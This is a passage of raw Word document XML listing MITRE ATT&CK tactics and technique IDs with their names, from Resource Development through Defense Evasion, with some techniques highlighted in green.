        <w:t xml:space="preserve"> Resource Development ['T1588.002', 'T1608.001', 'T1608.004', 'T1583.006', 'T1583.001', 'T1585.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9D75D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T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BEF69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T1608.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Stage Capabilities&gt;:Upload Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23073396"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T1608.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Stage Capabilities&gt;:Drive-by Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6652B976"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T1583.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Web Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA1D802"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T1583.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E88D08"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T1585.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Establish Accounts&gt;:Social Media Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0177509D"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1566.002', 'T1189', 'T1566.001', 'T1078.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C4F4E"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T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455B4CFC"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1189 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Drive-by Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA54932"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3470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F5E15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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D2F989"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1059.007', 'T1059', 'T1204.001', 'T1059.005', 'T1059.003', 'T1569.002', 'T1203', 'T1047', 'T1204.002', 'T1059.001', 'T1072', 'T1053.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BBCD51"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T1059.007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C08062"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1059 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Scripting Interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F09EEE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T1204.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F7380"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T1059.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>&lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309EF64E" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="002A1E3D" w:rsidRDefault="0059419E" w:rsidP="0059419E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002A1E3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002A1E3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5BCB1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T1569.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Services&gt;:Service Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258B8A33"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1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754193A0"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1047 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Management Instrumentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC95DCE"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3470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B208B45"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T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>&lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8B8B0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1072 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Software Deployment Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6661E894"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55246FD3"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1543.003', 'T1137', 'T1547.001', 'T1574.002', 'T1505.003', 'T1078.003', 'T1053.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E2C75E"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990506">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00990506">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2407598F"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1137 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Office Application Startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490398E4"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CC160B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC160B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC160B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC160B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0D49C8"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4472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T1505.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Server Software Component&gt;:Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBAD101"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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0D66D"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3470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435EDCE1"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1055', 'T1543.003', 'T1547.001', 'T1574.002', 'T1078.003', 'T1053.005', 'T1068']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294C6FF1"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1055 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746F3FF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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF621F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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F824AA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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44772350"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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29929FE3"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C898C"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1068 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7105C800"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lastRenderedPageBreak/>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1036', 'T1055', 'T1218.011', 'T1036.003', 'T1036.004', 'T1564.003', 'T1222.002', 'T1070.004', 'T1564.001', 'T1112', 'T1218.005', 'T1564.004', 'T1550.002', 'T1550.003', 'T1027.001', 'T1070.001', 'T1574.002', 'T1216.001', 'T1036.005', 'T1027', 'T1078.003', 'T1218.010', 'T1070.006']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D6A9DB"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1036 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173EE1CC"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1055 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6268FB2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2A1E3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1218.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002A1E3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707872F7"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T1036.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Rename System Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DF5F78"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T1036.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Masquerade Task or Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E749B"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T1564.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hide Artifacts&gt;:Hidden Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC3B5E"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T1222.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;File and Directory Permissions Modification&gt;:Linux and Mac File and Directory Permissions Modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E75E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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AE7A02"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T1564.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
